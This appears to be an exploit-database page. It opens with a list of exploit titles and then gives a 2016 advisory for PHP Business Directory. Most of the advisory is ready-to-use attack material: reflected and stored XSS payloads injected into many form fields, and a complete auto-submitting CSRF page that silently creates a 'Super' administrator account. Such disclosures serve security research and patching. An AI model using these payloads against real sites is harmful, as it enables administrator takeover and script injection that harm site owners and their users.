558ab1fc67
24 new exploits Entrepreneur Job Portal Script - SQL Injection Entrepreneur Job Portal Script 2.06 - SQL Injection NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation HP Client - Automation Command Injection / Remote Code Execution HP Client 9.1/9.0/8.1/7.9 - Command Injection NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation Firefox 49.0.1 - Denial of Service Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation Student Information System (SIS) 0.1 - Authentication Bypass Web Based Alumni Tracking System 0.1 - SQL Injection Simple Dynamic Web 0.1 - SQL Injection Learning Management System 0.1 - Authentication Bypass Fashion Shopping Cart 0.1 - SQL Injection Health Record System 0.1 - Authentication Bypass Windows x64 - WinExec() Shellcode (93 bytes) Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation PHP Telephone Directory - Multiple Vulnerabilities Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting PHP Image Database - Multiple Vulnerabilities Simple Shopping Cart Application 0.1 - SQL Injection PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) School Full CBT 0.1 - SQL Injection PHP Business Directory - Multiple Vulnerabilities Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
85 lines
No EOL
2.9 KiB
Text
Executable file
85 lines
No EOL
2.9 KiB
Text
Executable file
# Exploit Title: PHP Business Directory - Multiple Vulnerabilities
|
|
# Date: 2016-10-16
|
|
# Exploit Author: larrycompress
|
|
# Contact: larrycompress@gmail.com
|
|
# Type: webapps
|
|
# Platform: PHP
|
|
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
|
|
# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip
|
|
--------------------------------------------------------------------------------
|
|
|
|
POC as follows :
|
|
|
|
# 0x00 Reflected XSS
|
|
|
|
---
|
|
|
|
1.In public search :
|
|
|
|
http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
|
|
|
|
2.In administration web interface (need normal user login) :
|
|
|
|
http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
|
|
|
|
# 0x01 Stored XSS
|
|
|
|
---
|
|
|
|
1.In administration web directory interface (need normal user login) :
|
|
|
|
http://192.168.1.112/phpbusinessdirectory/administration.php
|
|
?pageaction=newsavebusiness
|
|
&subaction=submit
|
|
&businessname=<script>alert(1)</script>
|
|
&slogan=<script>alert(2)</script>
|
|
&businesslicence=<script>alert(3)</script>
|
|
&address=<script>alert(4)</script>
|
|
&city=<script>alert(5)</script>
|
|
&suburb=<script>alert(6)</script>
|
|
&businessstate=<script>alert(7)</script>
|
|
&country=<script>alert(8)</script>
|
|
&zippostcode=<script>alert(9)/*
|
|
&telephone1=*/</script><script>alert(10)</script>
|
|
&telephone2=<script>alert(11)</script>
|
|
&mobilecell=<script>alert(12)</script>
|
|
&fax=<script>alert(13)</script>
|
|
&email=<script>alert(14)</script>
|
|
&website=<script>alert(15)</script>
|
|
&socialmedia1=<script>alert(16)</script>
|
|
&socialmedia2=<script>alert(17)</script>
|
|
&socialmedia3=<script>alert(18)</script>
|
|
&productservice=<script>alert(19)</script>
|
|
&manager=<script>alert(20)</script>
|
|
&paymentsaccepted=<script>alert(21)</script>
|
|
|
|
2.In administration web categories interface (need administrator user login) :
|
|
|
|
http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
|
|
|
|
# 0x02 CSRF (add Super user)
|
|
|
|
---
|
|
|
|
In http://192.168.1.103/csrf.html :
|
|
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
|
|
<input name="pageaction" value="saveuser" type="hidden" />
|
|
<input name="subaction" value="submit" type="hidden" />
|
|
<input name="username" value="larry_csrf" type="hidden" />
|
|
<input name="password" value="larry_csrf" type="hidden" />
|
|
<input name="userfullname" value="larry_csrf" type="hidden" />
|
|
<input name="accesslevel" value="Super" type="hidden" />
|
|
<input name="userstatus" value="active" type="hidden" />
|
|
<input name="mysubmit" value="submit" type="submit" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
* Thanks to Besim * |